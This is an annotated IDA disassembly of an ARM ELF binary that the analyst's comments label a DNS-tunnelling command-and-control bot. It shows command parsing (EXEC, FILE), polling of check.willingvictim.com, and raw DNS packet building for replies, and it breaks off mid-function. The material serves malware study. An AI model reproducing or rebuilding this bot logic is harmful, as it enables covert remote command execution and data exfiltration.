.init:00010B18 ; .init:00010B18 ; +-------------------------------------------------------------------------+ .init:00010B18 ; | This file has been generated by The Interactive Disassembler (IDA) | .init:00010B18 ; | Copyright (c) 2015 Hex-Rays, <support@hex-rays.com> | .init:00010B18 ; +-------------------------------------------------------------------------+ .init:00010B18 ; .init:00010B18 ; Input MD5 : A09965D9859390F9A327B8FA017F79AA .init:00010B18 ; Input CRC32 : F36E250C .init:00010B18 .init:00010B18 ; File Name : sgdnsc2 .init:00010B18 ; Format : ELF for ARM (Executable) .init:00010B18 ; Imagebase : 10000 .init:00010B18 ; Interpreter '/lib/ld-musl-armhf.so.1' .init:00010B18 ; Needed Library 'libcrypto.so.1.0.0' .init:00010B18 ; Needed Library 'libnet.so.9' .init:00010B18 ; Needed Library 'libgcc_s.so.1' .init:00010B18 ; Needed Library 'libc.so' .init:00010B18 ; .init:00010B18 ; Options : EF_ARM_VFP_FLOAT .init:00010B18 ; EABI version: 5 .init:00010B18 ; .init:00010B18 .init:00010B18 ; Processor : ARM .init:00010B18 ; ARM architecture: ARMv6K .init:00010B18 ; Target assembler: Generic assembler for ARM .init:00010B18 ; Byte sex : Little endian .init:00010B18 .init:00010B18 ; =========================================================================== .init:00010B18 .init:00010B18 ; Segment type: Pure code .init:00010B18 AREA .init, CODE .init:00010B18 ; ORG 0x10B18 .init:00010B18 CODE32 .init:00010B18 .init:00010B18 ; =============== S U B R O U T I N E ======================================= .init:00010B18 .init:00010B18 .init:00010B18 EXPORT .init_proc .init:00010B18 .init_proc ; DATA XREF: start+20o .init:00010B18 ; .text:inito .init:00010B18 STMFD SP!, {R0,LR} ; _init .init:00010B1C LDMFD SP!, {R0,LR} .init:00010B20 TST LR, #1 .init:00010B24 MOVEQ PC, LR .init:00010B28 BX LR .init:00010B28 ; End of function .init_proc .init:00010B28 .init:00010B28 ; .init ends .init:00010B28 .plt:00010B2C ; --------------------------------------------------------------------------- .plt:00010B2C ; =========================================================================== .plt:00010B2C .plt:00010B2C ; Segment type: Pure code .plt:00010B2C AREA .plt, CODE .plt:00010B2C ; ORG 0x10B2C .plt:00010B2C CODE32 .plt:00010B2C STR LR, [SP,#-4]! .plt:00010B30 LDR LR, =(_GLOBAL_OFFSET_TABLE_ - 0x10B3C) .plt:00010B34 ADD LR, PC, LR ; _GLOBAL_OFFSET_TABLE_ .plt:00010B38 LDR PC, [LR,#8]! .plt:00010B38 ; --------------------------------------------------------------------------- .plt:00010B3C off_10B3C DCD _GLOBAL_OFFSET_TABLE_ - 0x10B3C .plt:00010B3C ; DATA XREF: .plt:00010B30r .plt:00010B40 ; [0000000C BYTES: COLLAPSED FUNCTION printf. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B4C ; [0000000C BYTES: COLLAPSED FUNCTION exit. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B58 ; [0000000C BYTES: COLLAPSED FUNCTION ns_initparse. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B64 ; [0000000C BYTES: COLLAPSED FUNCTION strstr. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B70 ; [0000000C BYTES: COLLAPSED FUNCTION fread. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B7C ; [0000000C BYTES: COLLAPSED FUNCTION ns_parserr. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B88 ; [0000000C BYTES: COLLAPSED FUNCTION fgets. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010B94 ; [0000000C BYTES: COLLAPSED FUNCTION calloc. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BA0 ; [0000000C BYTES: COLLAPSED FUNCTION htons. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BAC .plt:00010BAC ; =============== S U B R O U T I N E ======================================= .plt:00010BAC .plt:00010BAC ; Attributes: thunk .plt:00010BAC .plt:00010BAC ; struct __res_state *_res_state(void) .plt:00010BAC __res_state ; CODE XREF: send_packet_to_C_C+28p .plt:00010BAC ; send_packet_to_C_C+38p ... .plt:00010BAC ADR R12, 0x10BB4 .plt:00010BB0 ADD R12, R12, #0x11000 .plt:00010BB4 LDR PC, [R12,#(__res_state_ptr - 0x21BB4)]! ; __imp___res_state .plt:00010BB4 ; End of function __res_state .plt:00010BB4 .plt:00010BB8 ; [0000000C BYTES: COLLAPSED FUNCTION free. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BC4 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_push. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BD0 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_read. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BDC ; [0000000C BYTES: COLLAPSED FUNCTION fprintf. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BE8 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_f_base64. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010BF4 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_get_ipaddr4. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C00 ; [0000000C BYTES: COLLAPSED FUNCTION memcpy. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C0C ; [0000000C BYTES: COLLAPSED FUNCTION libnet_build_ipv4. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C18 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_destroy. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C24 ; [0000000C BYTES: COLLAPSED FUNCTION pclose. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C30 ; [0000000C BYTES: COLLAPSED FUNCTION memset. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C3C ; [0000000C BYTES: COLLAPSED FUNCTION res_init. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C48 ; [0000000C BYTES: COLLAPSED FUNCTION popen. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C54 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_set_flags. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C60 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_new_mem_buf. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C6C ; [0000000C BYTES: COLLAPSED FUNCTION res_query. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C78 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_new. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C84 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_ctrl. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C90 ; [0000000C BYTES: COLLAPSED FUNCTION fwrite. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010C9C ; [0000000C BYTES: COLLAPSED FUNCTION fopen. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CA8 ; [0000000C BYTES: COLLAPSED FUNCTION __deregister_frame_info. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CB4 ; [0000000C BYTES: COLLAPSED FUNCTION snprintf. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CC0 ; [0000000C BYTES: COLLAPSED FUNCTION __register_frame_info. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CCC ; [0000000C BYTES: COLLAPSED FUNCTION libnet_init. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CD8 ; [0000000C BYTES: COLLAPSED FUNCTION __libc_start_main. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CE4 ; [0000000C BYTES: COLLAPSED FUNCTION fseek. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CF0 ; [0000000C BYTES: COLLAPSED FUNCTION fclose. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010CFC ; [0000000C BYTES: COLLAPSED FUNCTION libnet_build_dnsv4. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D08 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_free_all. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D14 ; [0000000C BYTES: COLLAPSED FUNCTION inet_aton. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D20 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_write. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D2C ; [0000000C BYTES: COLLAPSED FUNCTION libnet_geterror. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D38 ; [0000000C BYTES: COLLAPSED FUNCTION sleep. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D44 ; [0000000C BYTES: COLLAPSED FUNCTION strlen. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D50 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_build_udp. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D5C ; [0000000C BYTES: COLLAPSED FUNCTION BIO_write. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D68 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_name2addr4. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D74 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_s_mem. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D80 ; [0000000C BYTES: COLLAPSED FUNCTION __assert_fail. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D8C ; [0000000C BYTES: COLLAPSED FUNCTION malloc. PRESS CTRL-NUMPAD+ TO EXPAND] .plt:00010D98 ; [0000000C BYTES: COLLAPSED FUNCTION ftell. PRESS CTRL-NUMPAD+ TO EXPAND] .text:00010DA4 .text:00010DA4 .text:00010DA4 .text:00010DA4 ;************************************************************* .text:00010DA4 ;* mainLoop * .text:00010DA4 ;************************************************************* .text:00010DA4 ;* DESCRIPTION : main loop. Contact C&C server, if there is * .text:00010DA4 ;* a valid command, executes it, if not, sleep * .text:00010DA4 ;* for one minute .text:00010DA4 ;************************************************************* .text:00010DA4 .text:00010DA4 ; =========================================================================== .text:00010DA4 .text:00010DA4 ; Segment type: Pure code .text:00010DA4 AREA .text, CODE .text:00010DA4 ; ORG 0x10DA4 .text:00010DA4 CODE32 .text:00010DA4 .text:00010DA4 ; =============== S U B R O U T I N E ======================================= .text:00010DA4 .text:00010DA4 ; Attributes: noreturn .text:00010DA4 .text:00010DA4 mainLoop ; DATA XREF: start+24o .text:00010DA4 ; .text:maino .text:00010DA4 STMFD SP!, {R4-R6,LR} .text:00010DA8 MOV R1, #1 ; size .text:00010DAC MOV R0, #0x200 ; nmemb .text:00010DB0 BL calloc .text:00010DB4 MOV R4, R0 .text:00010DB8 LDR R5, =aHello ; "HELLO:" .text:00010DBC .text:00010DBC lookForC2Command ; CODE XREF: mainLoop+38j .text:00010DBC ; mainLoop+60j .text:00010DBC LDR R0, [R5,#(dword_21ED0 - 0x21E54)] ; seconds .text:00010DC0 BL sleep ; 2 seconds sleep .text:00010DC4 MOV R0, R4 .text:00010DC8 BL init_session_with_C2_server .text:00010DCC CMP R0, #1 .text:00010DD0 BEQ HELLOReceived .text:00010DD4 LDR R0, =aConnectionCoul ; "\nConnection could not be made. Sleepin"... .text:00010DD8 BL printf .text:00010DDC B lookForC2Command .text:00010DE0 ; --------------------------------------------------------------------------- .text:00010DE0 .text:00010DE0 HELLOReceived ; CODE XREF: mainLoop+2Cj .text:00010DE0 LDR R0, =aControlServerS ; "\nControl server says HELLO. Entering c"... .text:00010DE4 BL printf .text:00010DE8 B command_received .text:00010DEC ; --------------------------------------------------------------------------- .text:00010DEC .text:00010DEC waitABigMinute ; CODE XREF: mainLoop+5Cj .text:00010DEC LDR R0, [R5,#0x7C] ; seconds .text:00010DF0 BL sleep .text:00010DF4 .text:00010DF4 command_received ; CODE XREF: mainLoop+44j .text:00010DF4 MOV R0, R4 .text:00010DF8 BL InterpretAndExecuteCommand .text:00010DFC CMN R0, #1 .text:00010E00 BNE waitABigMinute .text:00010E04 B lookForC2Command .text:00010E04 ; End of function mainLoop .text:00010E04 .text:00010E04 ; --------------------------------------------------------------------------- .text:00010E08 off_10E08 DCD aHello ; DATA XREF: mainLoop+14r .text:00010E08 ; "HELLO:" .text:00010E0C ; char *format .text:00010E0C format DCD aConnectionCoul ; DATA XREF: mainLoop+30r .text:00010E0C ; "\nConnection could not be made. Sleepin"... .text:00010E10 ; char *off_10E10 .text:00010E10 off_10E10 DCD aControlServerS ; DATA XREF: mainLoop:HELLOReceivedr .text:00010E10 ; "\nControl server says HELLO. Entering c"... .text:00010E14 .text:00010E14 ; =============== S U B R O U T I N E ======================================= .text:00010E14 .text:00010E14 ; Attributes: noreturn .text:00010E14 .text:00010E14 ; int __fastcall start(void (*fini)(void), int, int, int, void (*rtld_fini)(void)) .text:00010E14 EXPORT start .text:00010E14 start .text:00010E14 .text:00010E14 var_8 = -8 .text:00010E14 fini = -4 .text:00010E14 rtld_fini = 0 .text:00010E14 .text:00010E14 MOV R11, #0 .text:00010E18 MOV LR, #0 .text:00010E1C LDR R1, [SP+rtld_fini],#4 ; argc .text:00010E20 MOV R2, SP ; ubp_av .text:00010E24 LDR R3, =.term_proc .text:00010E28 STR R11, [SP,#-4+rtld_fini]! ; stack_end .text:00010E2C STR R0, [SP,#fini]! ; fini .text:00010E30 STR R3, [SP,#4+var_8]! .text:00010E34 LDR R3, =.init_proc ; init .text:00010E38 LDR R0, =mainLoop ; main .text:00010E3C BL __libc_start_main .text:00010E40 .text:00010E40 loc_10E40 ; CODE XREF: start:loc_10E40j .text:00010E40 B loc_10E40 .text:00010E40 ; End of function start .text:00010E40 .text:00010E40 ; --------------------------------------------------------------------------- .text:00010E44 off_10E44 DCD .term_proc ; DATA XREF: start+10r .text:00010E48 ; void (*init)(void) .text:00010E48 init DCD .init_proc ; DATA XREF: start+20r .text:00010E4C ; int (__cdecl *main)(int, char **, char **) .text:00010E4C main DCD mainLoop ; DATA XREF: start+24r .text:00010E50 .text:00010E50 ; =============== S U B R O U T I N E ======================================= .text:00010E50 .text:00010E50 .text:00010E50 sub_10E50 ; CODE XREF: sub_10EB8+18p .text:00010E50 LDR R0, =__bss_start .text:00010E54 LDR R3, =0x21EDB .text:00010E58 RSB R3, R0, R3 .text:00010E5C CMP R3, #6 .text:00010E60 BXLS LR .text:00010E64 LDR R3, =0 .text:00010E68 CMP R3, #0 .text:00010E6C BXEQ LR .text:00010E70 BX R3 .text:00010E70 ; End of function sub_10E50 .text:00010E70 .text:00010E70 ; --------------------------------------------------------------------------- .text:00010E74 off_10E74 DCD __bss_start ; DATA XREF: sub_10E50r .text:00010E78 dword_10E78 DCD 0x21EDB ; DATA XREF: sub_10E50+4r .text:00010E7C off_10E7C DCD 0 ; DATA XREF: sub_10E50+14r .text:00010E80 .text:00010E80 ; =============== S U B R O U T I N E ======================================= .text:00010E80 .text:00010E80 .text:00010E80 sub_10E80 ; CODE XREF: sub_10F00:loc_10F20p .text:00010E80 LDR R0, =__bss_start .text:00010E84 LDR R1, =__bss_start .text:00010E88 RSB R1, R0, R1 .text:00010E8C MOV R1, R1,ASR#2 .text:00010E90 ADD R1, R1, R1,LSR#31 .text:00010E94 MOVS R1, R1,ASR#1 .text:00010E98 BXEQ LR .text:00010E9C LDR R3, =0 .text:00010EA0 CMP R3, #0 .text:00010EA4 BXEQ LR .text:00010EA8 BX R3 .text:00010EA8 ; End of function sub_10E80 .text:00010EA8 .text:00010EA8 ; --------------------------------------------------------------------------- .text:00010EAC off_10EAC DCD __bss_start ; DATA XREF: sub_10E80r .text:00010EB0 off_10EB0 DCD __bss_start ; DATA XREF: sub_10E80+4r .text:00010EB4 off_10EB4 DCD 0 ; DATA XREF: sub_10E80+1Cr .text:00010EB8 .text:00010EB8 ; =============== S U B R O U T I N E ======================================= .text:00010EB8 .text:00010EB8 .text:00010EB8 sub_10EB8 ; DATA XREF: .fini_array:00021C8Co .text:00010EB8 LDR R3, =byte_21EDC .text:00010EBC LDRB R2, [R3] .text:00010EC0 CMP R2, #0 .text:00010EC4 BXNE LR .text:00010EC8 STMFD SP!, {R4,LR} .text:00010ECC MOV R4, R3 .text:00010ED0 BL sub_10E50 .text:00010ED4 LDR R3, =0 .text:00010ED8 CMP R3, #0 .text:00010EDC BEQ loc_10EE8 .text:00010EE0 LDR R0, =unk_11C84 .text:00010EE4 BL __deregister_frame_info .text:00010EE8 .text:00010EE8 loc_10EE8 ; CODE XREF: sub_10EB8+24j .text:00010EE8 MOV R3, #1 .text:00010EEC STRB R3, [R4] .text:00010EF0 LDMFD SP!, {R4,PC} .text:00010EF0 ; End of function sub_10EB8 .text:00010EF0 .text:00010EF0 ; --------------------------------------------------------------------------- .text:00010EF4 off_10EF4 DCD byte_21EDC ; DATA XREF: sub_10EB8r .text:00010EF8 dword_10EF8 DCD 0 ; DATA XREF: sub_10EB8+1Cr .text:00010EFC off_10EFC DCD unk_11C84 ; DATA XREF: sub_10EB8+28r .text:00010F00 .text:00010F00 ; =============== S U B R O U T I N E ======================================= .text:00010F00 .text:00010F00 .text:00010F00 sub_10F00 ; DATA XREF: .init_array:00021C88o .text:00010F00 LDR R3, =0 .text:00010F04 CMP R3, #0 .text:00010F08 BEQ loc_10F20 .text:00010F0C STMFD SP!, {R4,LR} .text:00010F10 LDR R1, =unk_21EE0 .text:00010F14 LDR R0, =unk_11C84 .text:00010F18 BL __register_frame_info .text:00010F1C LDMFD SP!, {R4,LR} .text:00010F20 .text:00010F20 loc_10F20 ; CODE XREF: sub_10F00+8j .text:00010F20 B sub_10E80 .text:00010F20 ; End of function sub_10F00 .text:00010F20 .text:00010F20 ; --------------------------------------------------------------------------- .text:00010F24 dword_10F24 DCD 0 ; DATA XREF: sub_10F00r .text:00010F28 off_10F28 DCD unk_21EE0 ; DATA XREF: sub_10F00+10r .text:00010F2C off_10F2C DCD unk_11C84 ; DATA XREF: sub_10F00+14r .text:00010F30 .text:00010F30 .text:00010F30 .text:00010F30 ;************************************************************* .text:00010F30 ;* GetCommandID * .text:00010F30 ;************************************************************* .text:00010F30 ;* DESCRIPTION : look for commands in R4 string. * .text:00010F30 ;* * .text:00010F30 ;* INPUT : * .text:00010F30 ;* R4 = command string * .text:00010F30 ;* * .text:00010F30 ;* OUTPUT : * .text:00010F30 ;* * .text:00010F30 ;* RETURN : * .text:00010F30 ;* 0 for an unknown command * .text:00010F30 ;* 1 for "HELLO:" * .text:00010F30 ;* 2 for "NONE:" * .text:00010F30 ;* 3 for "EXEC:" * .text:00010F30 ;* 4 for "FILE:" * .text:00010F30 ;************************************************************* .text:00010F30 .text:00010F30 .text:00010F30 ; =============== S U B R O U T I N E ======================================= .text:00010F30 .text:00010F30 .text:00010F30 getCommandID ; CODE XREF: init_session_with_C2_server+38p .text:00010F30 ; InterpretAndExecuteCommand+4Cp .text:00010F30 STMFD SP!, {R4,LR} .text:00010F34 LDR R1, =aHello ; "HELLO:" .text:00010F38 MOV R4, R0 .text:00010F3C BL strstr .text:00010F40 CMP R0, #0 .text:00010F44 BEQ Is_it_NONE .text:00010F48 MOV R0, #1 .text:00010F4C LDMFD SP!, {R4,PC} .text:00010F50 ; --------------------------------------------------------------------------- .text:00010F50 .text:00010F50 Is_it_NONE ; CODE XREF: getCommandID+14j .text:00010F50 LDR R1, =aNone ; "NONE:" .text:00010F54 MOV R0, R4 ; haystack .text:00010F58 BL strstr .text:00010F5C CMP R0, #0 .text:00010F60 BEQ Is_it_EXEC .text:00010F64 MOV R0, #2 .text:00010F68 LDMFD SP!, {R4,PC} .text:00010F6C ; --------------------------------------------------------------------------- .text:00010F6C .text:00010F6C Is_it_EXEC ; CODE XREF: getCommandID+30j .text:00010F6C LDR R1, =aExec ; "EXEC:" .text:00010F70 MOV R0, R4 ; haystack .text:00010F74 BL strstr .text:00010F78 CMP R0, #0 .text:00010F7C BEQ Is_it_FILE .text:00010F80 MOV R0, #3 .text:00010F84 LDMFD SP!, {R4,PC} .text:00010F88 ; --------------------------------------------------------------------------- .text:00010F88 .text:00010F88 Is_it_FILE ; CODE XREF: getCommandID+4Cj .text:00010F88 MOV R0, R4 ; haystack .text:00010F8C LDR R1, =aFile ; "FILE:" .text:00010F90 BL strstr .text:00010F94 CMP R0, #0 .text:00010F98 MOVNE R0, #4 .text:00010F9C MOVEQ R0, #0 .text:00010FA0 LDMFD SP!, {R4,PC} .text:00010FA0 ; End of function getCommandID .text:00010FA0 .text:00010FA0 ; --------------------------------------------------------------------------- .text:00010FA4 ; char *needle .text:00010FA4 needle DCD aHello ; DATA XREF: getCommandID+4r .text:00010FA4 ; "HELLO:" .text:00010FA8 ; char *off_10FA8 .text:00010FA8 off_10FA8 DCD aNone ; DATA XREF: getCommandID:Is_it_NONEr .text:00010FA8 ; "NONE:" .text:00010FAC ; char *off_10FAC .text:00010FAC off_10FAC DCD aExec ; DATA XREF: getCommandID:Is_it_EXECr .text:00010FAC ; "EXEC:" .text:00010FB0 ; char *off_10FB0 .text:00010FB0 off_10FB0 DCD aFile ; DATA XREF: getCommandID+5Cr .text:00010FB0 ; "FILE:" .text:00010FB4 .text:00010FB4 .text:00010FB4 .text:00010FB4 ;************************************************************* .text:00010FB4 ;* send_packet_to_C_C * .text:00010FB4 ;************************************************************* .text:00010FB4 ;* * .text:00010FB4 ;* INPUT: * .text:00010FB4 ;* R1 = host name used to ask DNS request * .text:00010FB4 ;* - check.willingvictim.com is used to ask for a * .text:00010FB4 ;* command to execute * .text:00010FB4 ;* * .text:00010FB4 ;* RETURN: * .text:00010FB4 ;* * .text:00010FB4 ;************************************************************* .text:00010FB4 .text:00010FB4 .text:00010FB4 ; =============== S U B R O U T I N E ======================================= .text:00010FB4 .text:00010FB4 .text:00010FB4 send_packet_to_C_C ; CODE XREF: init_session_with_C2_server+14p .text:00010FB4 ; InterpretAndExecuteCommand+14p .text:00010FB4 .text:00010FB4 var_670 = -0x670 .text:00010FB4 var_668 = -0x668 .text:00010FB4 var_664 = -0x664 .text:00010FB4 inp = -0x660 .text:00010FB4 var_65C = -0x65C .text:00010FB4 s = -0x62C .text:00010FB4 var_42C = -0x42C .text:00010FB4 var_1C = -0x1C .text:00010FB4 .text:00010FB4 STMFD SP!, {R4-R7,LR} .text:00010FB8 SUB SP, SP, #0x650 .text:00010FBC SUB SP, SP, #0xC .text:00010FC0 MOV R6, R1 .text:00010FC4 MOV R7, R0 .text:00010FC8 BL res_init .text:00010FCC LDR R3, =aHello ; "HELLO:" .text:00010FD0 ADD R1, SP, #0x670+inp ; inp .text:00010FD4 LDR R0, [R3,#(dword_21E74 - 0x21E54)] ; 0x11C74 => '172.16.240.129' => non-routable address. Gnome one. .text:00010FD8 BL inet_aton .text:00010FDC BL __res_state .text:00010FE0 LDR R3, [SP,#0x670+inp] .text:00010FE4 MOV R4, #1 .text:00010FE8 STR R3, [R0,#0x14] .text:00010FEC BL __res_state .text:00010FF0 MOV R3, #2 .text:00010FF4 STRH R3, [R0,#0x10] .text:00010FF8 BL __res_state .text:00010FFC MOV R5, R0 .text:00011000 MOV R0, #0x35 ; hostshort .text:00011004 BL htons ; converts the unsigned short integer hostshort from host byte order to network byte order .text:00011008 STRH R0, [R5,#0x12] .text:0001100C BL __res_state .text:00011010 MOV R5, #0x200 .text:00011014 ADD R3, SP, #0x670+s .text:00011018 STR R4, [R0,#0xC] .text:0001101C MOV R2, R5 ; n .text:00011020 MOV R0, R3 ; s .text:00011024 MOV R1, #0 ; c .text:00011028 STR R3, [SP,#0x670+var_668] .text:0001102C BL memset .text:00011030 MOV R1, R4 .text:00011034 STR R5, [SP,#0x670+var_670] .text:00011038 MOV R0, R6 ; R6 = hostname to contact .text:0001103C LDR R3, [SP,#0x670+var_668] ; answer .text:00011040 MOV R2, #0x10 .text:00011044 BL res_query ; ==> Send DNS packet to C&C server .text:00011048 SUBS R1, R0, #0 .text:0001104C BLE error .text:00011050 ADD R3, SP, #0x670+var_65C ; handle to parsed answer .text:00011054 MOV R2, R3 .text:00011058 LDR R0, [SP,#0x670+var_668] ; response message buffer .text:0001105C STR R3, [SP,#0x670+var_664] .text:00011060 BL ns_initparse ; init name server library .text:00011064 ADD R3, SP, #0x670+var_42C .text:00011068 MOV R2, #0 .text:0001106C MOV R1, R4 .text:00011070 LDR R0, [SP,#0x670+var_664] .text:00011074 BL ns_parserr .text:00011078 LDR R3, [SP,#0x670+var_1C] .text:0001107C MOV R0, R7 ; s .text:00011080 ADD R3, R3, R4 .text:00011084 LDR R2, =(aCSCCCCCCCCCCCC+0x28) ; format .text:00011088 MOV R1, #0x400 ; maxlen .text:0001108C BL snprintf .text:00011090 MOV R0, R4 .text:00011094 .text:00011094 return ; CODE XREF: send_packet_to_C_C+F0j .text:00011094 ADD SP, SP, #0x650 .text:00011098 ADD SP, SP, #0xC .text:0001109C LDMFD SP!, {R4-R7,PC} .text:000110A0 ; --------------------------------------------------------------------------- .text:000110A0 .text:000110A0 error ; CODE XREF: send_packet_to_C_C+98j .text:000110A0 MOV R0, #0xFFFFFFFF .text:000110A4 B return .text:000110A4 ; End of function send_packet_to_C_C .text:000110A4 .text:000110A4 ; --------------------------------------------------------------------------- .text:000110A8 off_110A8 DCD aHello ; DATA XREF: send_packet_to_C_C+18r .text:000110A8 ; "HELLO:" .text:000110AC ; char *off_110AC .text:000110AC off_110AC DCD aCSCCCCCCCCCCCC+0x28 ; DATA XREF: send_packet_to_C_C+D0r .text:000110AC ; "%s" .text:000110B0 .text:000110B0 ; =============== S U B R O U T I N E ======================================= .text:000110B0 .text:000110B0 .text:000110B0 buildAndSendDNSPacket ; CODE XREF: sendShortReplyTo_C2_Server+20p .text:000110B0 ; sendLargeReplyTo_C2_server+78p .text:000110B0 .text:000110B0 var_580 = -0x580 .text:000110B0 var_57C = -0x57C .text:000110B0 var_578 = -0x578 .text:000110B0 var_574 = -0x574 .text:000110B0 var_570 = -0x570 .text:000110B0 var_56C = -0x56C .text:000110B0 var_568 = -0x568 .text:000110B0 var_564 = -0x564 .text:000110B0 var_560 = -0x560 .text:000110B0 var_55C = -0x55C .text:000110B0 var_558 = -0x558 .text:000110B0 var_554 = -0x554 .text:000110B0 var_550 = -0x550 .text:000110B0 var_54C = -0x54C .text:000110B0 var_548 = -0x548 .text:000110B0 var_544 = -0x544 .text:000110B0 var_540 = -0x540 .text:000110B0 var_53C = -0x53C .text:000110B0 var_538 = -0x538 .text:000110B0 var_534 = -0x534 .text:000110B0 var_52C = -0x52C .text:000110B0 var_528 = -0x528 .text:000110B0 s = -0x428 .text:000110B0 .text:000110B0 STMFD SP!, {R4-R11,LR} .text:000110B4 SUB SP, SP, #0x550 .text:000110B8 SUB SP, SP, #0xC .text:000110BC MOV R8, R0 .text:000110C0 MOV R4, R1 .text:000110C4 MOV R11, R2 ; R11 = arg2 .text:000110C8 MOV R1, #0 .text:000110CC ADD R2, SP, #0x580+var_528 .text:000110D0 MOV R0, #1 .text:000110D4 BL libnet_init .text:000110D8 SUBS R5, R0, #0 .text:000110DC BEQ errorLibnet_init .text:000110E0 BL libnet_get_ipaddr4 .text:000110E4 MOV R1, R4 ; hostname = arg1 .text:000110E8 MOV R2, #1 ; LIBNET_RESOLVE .text:000110EC STR R0, [SP,#0x580+var_52C] ; libnet context .text:000110F0 MOV R0, R5 .text:000110F4 BL libnet_name2addr4 .text:000110F8 MOV R10, R0 ; R10 = IP address of host name received in arg1 .text:000110FC MOV R0, R8 ; s .text:00011100 BL strlen ; strlen ( arg1 ); .text:00011104 MOV R7, R0 .text:00011108 MOV R0, R11 ; s .text:0001110C BL strlen ; strlen ( arg2 ) .text:00011110 MOV R6, #1 .text:00011114 MOV R2, #0x10 .text:00011118 MOV R4, #0 .text:0001111C MOV R9, #0xC .text:00011120 MOV R1, #0xC0 .text:00011124 MOV R12, #5 .text:00011128 STR R2, [SP,#0x580+var_55C] .text:0001112C STR R2, [SP,#0x580+var_574] .text:00011130 ADD R2, R7, R6 ; R2 = strlen(arg1)+1 .text:00011134 STR R11, [SP,#0x580+var_580] ; arg2 => 0x580 .text:00011138 UXTB R2, R2 .text:0001113C ADD R11, SP, #0x580+s .text:00011140 UXTB R3, R0 .text:00011144 UXTB R7, R7 .text:00011148 STR R1, [SP,#0x580+var_568] .text:0001114C STR R2, [SP,#0x580+var_53C] ; strlen(ar2)+1 => 53C .text:00011150 MOV R1, #0x400 ; maxlen .text:00011154 LDR R2, =aCSCCCCCCCCCCCC ; "%c%s%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%"... .text:00011158 STR R4, [SP,#0x580+var_560] ; 0 => 0x560 .text:0001115C STR R4, [SP,#0x580+var_570] ; 0 => 0x570 .text:00011160 STR R4, [SP,#0x580+var_578] ; 0 => 0x578 .text:00011164 STR R4, [SP,#0x580+var_57C] ; 0 => 0x57C .text:00011168 STR R6, [SP,#0x580+var_56C] .text:0001116C STR R9, [SP,#0x580+var_564] .text:00011170 MOV R0, R11 ; s .text:00011174 STR R7, [SP,#0x580+var_538] .text:00011178 STR R12, [SP,#0x580+var_544] .text:0001117C STR R8, [SP,#0x580+var_534] .text:00011180 STR R4, [SP,#0x580+var_540] ; 0 => 0x540 .text:00011184 STR R4, [SP,#0x580+var_548] ; 0 => 0x548 .text:00011188 STR R4, [SP,#0x580+var_54C] ; 0 => 0x54C .text:0001118C STR R4, [SP,#0x580+var_550] ; 0 => 0x550 .text:00011190 STR R4, [SP,#0x580+var_558] ; 0 => 0x558 .text:00011194 STR R6, [SP,#0x580+var_554] .text:00011198 BL snprintf .text:0001119C UXTH R7, R0 ; payload = arg2 .text:000111A0 STR R7, [SP,#0x580+var_570] .text:000111A4 STR R4, [SP,#0x580+var_568] .text:000111A8 STR R11, [SP,#0x580+var_574] .text:000111AC STR R4, 